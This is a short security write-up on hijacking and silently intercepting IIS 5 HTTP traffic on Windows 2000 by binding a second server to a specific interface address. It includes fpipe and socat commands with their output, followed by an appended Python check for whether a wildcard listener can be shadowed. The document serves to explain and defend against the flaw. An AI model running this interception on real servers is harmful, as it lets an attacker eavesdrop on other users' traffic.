Even though Microsoft introduced the SO_EXCLUSIVEADDRUSE socket option in Windows NT 4.0 Service Pack 4, it seems that some Microsoft application servers did not use it.
For instance, the HTTP server component of Internet Information Services (IIS) 5, shipped with Windows 2000, listens by default on all network interfaces on ports 80 and 443. Because a bind to a specific address takes precedence over a wildcard bind, it is possible to hijack the HTTP server of IIS 5 with a second TCP server bound to the IP address of a specific interface.
Even more interesting, when a TCP server listens on all interfaces, its TCP traffic can be silently intercepted: a second TCP server bound to a specific interface intercepts the traffic and redirects it to the loopback address, so that the data is finally delivered to the hijacked server (thanks to Franck Davy for suggesting this).
On a Windows 2000 server with IIS 5, the HTTP service listens on all interfaces:
    C:\WINNT\>netstat -an | find "80"
      TCP    0.0.0.0:80             0.0.0.0:0              LISTENING
Using fpipe, a second TCP server is bound to IPv4 address 192.70.106.142 and configured to redirect traffic to the loopback address (127.0.0.1), with TCP port 80 as destination:
    C:\WINNT\>fpipe -l 80 -r 80 -i 192.70.106.142 127.0.0.1 -v
    FPipe v2.1 - TCP/UDP port redirector.
    Copyright 2000 (c) by Foundstone, Inc.
    http://www.foundstone.com

    Listening for TCP connections on 192.70.106.142 port 80
Using socat to send an HTTP query:
    jbm@garbarek ~> socat - tcp4:192.70.106.142:80
    GET / HTTP/1.1
    Host: localhost

The second server receives the connection on port 80 and redirects the data to the IIS 5 server, using 127.0.0.1 as destination address:
    Connection accepted from 192.70.106.76 port 1077
    Attempting to connect to 192.70.106.76 port 1077
    Pipe connected:
         In: 192.70.106.76:1077 --> 192.70.106.142:80
        Out: 192.70.106.142:33014 --> 127.0.0.1:80
    15 bytes received from inbound connection
    16 bytes received from inbound connection
    1 bytes received from inbound connection
    273 bytes received from outbound connection
    Outbound connection lost
    Closing outbound connection
    Closing inbound connection
    Quit signal detected. Shutting down...
The TCP client finally receives the data sent by the IIS 5 server:
    HTTP/1.1 404 Object Not Found
    Server: Microsoft-IIS/5.0
    Date: Thu, 22 May 2003 16:25:32 GMT
    Connection: close
    Content-Type: text/html
    Content-Length: 111
    [...]
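A defender's check of the mechanism described above, added here as an example and not part of the original post: it opens a wildcard (0.0.0.0) listener on an ephemeral port, requesting SO_EXCLUSIVEADDRUSE where Winsock offers it (the option the text says IIS 5 did not set), then reports whether a second socket can still bind the same port on 127.0.0.1. The function names are assumptions of this example; the Windows error behaviour noted in the comments follows Microsoft's documentation of the option.

```python
import socket


def make_listener(address, port, exclusive=True):
    """Bind and listen on (address, port) as a TCP server.

    exclusive=True requests SO_EXCLUSIVEADDRUSE where the platform has it
    (Winsock). With it, any later bind() on the same port fails, including
    a bind to a specific interface address that would otherwise shadow a
    0.0.0.0 listener. POSIX stacks have no such constant and already refuse
    the second bind unless SO_REUSEADDR is in play, so it is skipped there.
    """
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    if exclusive and hasattr(socket, "SO_EXCLUSIVEADDRUSE"):
        s.setsockopt(socket.SOL_SOCKET, socket.SO_EXCLUSIVEADDRUSE, 1)
    s.bind((address, port))
    s.listen(5)
    return s


def wildcard_listener_can_be_shadowed(exclusive=True):
    """Return True if a second socket can bind the same port on 127.0.0.1
    while a 0.0.0.0 listener holds it (the hijackable state shown above),
    False if the OS refuses the second bind.

    Port 0 asks the OS for a free ephemeral port, so the check never
    collides with a real service on the host running it.
    """
    server = make_listener("0.0.0.0", 0, exclusive=exclusive)
    port = server.getsockname()[1]
    rival = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        rival.bind(("127.0.0.1", port))
        return True
    except OSError:
        # EADDRINUSE on POSIX; on Windows WSAEACCES when the first socket
        # set SO_EXCLUSIVEADDRUSE.
        return False
    finally:
        rival.close()
        server.close()


if __name__ == "__main__":
    # Expected: False everywhere for the exclusive listener. A True result
    # for the plain listener is the IIS 5 situation described above.
    print("exclusive 0.0.0.0 listener shadowable:", wildcard_listener_can_be_shadowed(True))
    print("plain 0.0.0.0 listener shadowable:    ", wildcard_listener_can_be_shadowed(False))
```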